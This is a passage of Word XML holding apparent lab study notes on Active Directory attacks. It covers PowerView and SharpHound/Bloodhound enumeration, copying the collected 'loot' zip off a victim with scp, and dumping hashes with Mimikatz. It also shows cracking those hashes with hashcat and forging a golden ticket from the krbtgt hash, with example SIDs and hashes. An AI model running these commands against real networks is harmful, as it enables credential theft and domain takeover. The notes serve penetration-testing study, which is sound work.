    <w:p w14:paraId="776148F7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Invoke-ShareFinder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A392796" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find OS running inside of the network besides default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB08913" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Get-NetComputer -fulldata | select operatingsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688760BC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumeration with Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C970D66" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>graphical interface that allows a visual mapping of a network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E9DA9F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>combined with SharpHound – takes user, groups, trusts, etc. of network and collects them into .json files to be used inside of Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B74D40F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bloodhound Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF83C89" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>apt-get install bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D371BA0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>sudo neo4j console – default credentials – neo4j:neo4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762BAA61" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>leave running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043442C1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Getting Loot with Sharphound – on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F18ECC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>powershell -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45001A26" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>. .\Downloads\SharpHound.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF80F2E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>syntax. Invoke-Bloodhound -CollectionMethod &lt;option&gt; -Domain &lt;domain&gt; -ZipFileName &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B165A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59454ED7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>pull loot file using scp via ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE6745" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>syntax - scp remote_username@10.10.0.2:/remote/file.txt /local/directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCA1C1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. scp Administrator@10.10.154.64:/C:/Users/Administrator/20210119202107_loot.zip /home/nicholas/Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD61ADD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Mapping the Network with Bloodhound - Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD18181" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>run bloodhound command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61F6F3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>drag/drop .zip .json files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B8DE3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Queries/Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F0D7C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Dumping Hashes with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51054DF3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C3F83" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D756F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>20 Ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703EEBED" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>lsadump::lsa /patch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EDE3AD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dumps hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19443200" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>copy and crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683EEEC8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>hashcat -m 1000 &lt;hash&gt; rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515B651E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Golden Ticket Attacks with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A431068" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dump hash and SID of krbtgt user then create a golden ticket to open up a new command prompt to allow for access to any machine on network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D93DD3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Dump the KRBTGT Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E258B89" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>lsadump::lsa /inject /name:krbtgt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6166F656" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Create a Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46052CD7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>syntax - kerberos::golden /user: /domain: /sid: /krbtgt: /id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9607A6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt: 5508500012cc005cf7082a9a89ebdfdf /id:500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B05973" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D646B12" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use the Golden Ticket to Access Other Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C404B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>msic::cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB6446" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Patch OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6872A1E7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ctrl+C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B9F7E8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>shell created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496842B7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumeration with Server Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD4529A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>using built in windows features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F71BBE8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>server manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59428494" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>if domain admin access attained</w:t>
      </w:r>
    </w:p>
